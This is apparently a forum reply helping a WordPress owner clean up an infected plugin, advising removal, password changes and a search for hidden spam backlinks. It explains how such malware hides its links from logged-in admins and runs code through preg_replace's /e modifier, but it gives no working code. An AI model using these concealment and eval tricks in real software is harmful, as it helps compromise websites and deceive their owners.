Delete the plugin and change all your password credentials, I tried to decode it using online php decoders, but that one is hard.

Mostly those code add hidden backlinks in the WordPress page, so try and search if there are any, or it must be taking information.

Also check in other files and you will find that there will be malicious code in various places, because of that reason, your site is throwing 500 errors on every page except on home page.

I 'm telling this from personal experience. There was a malicious code in my theme, which added backlinks on all the pages, but I saw it too late because it was programmed to be visible for everyone except the logged in users and admins

I manually tried to decode it. I got the below output. but it is incomplete (as only a small part of the code is shared.).
http://pastebin.com/WJP2b7rS

Comment: Its taking advantage of the `/e` modifier to `preg_replace` to eval parts of the string. Bad joojoo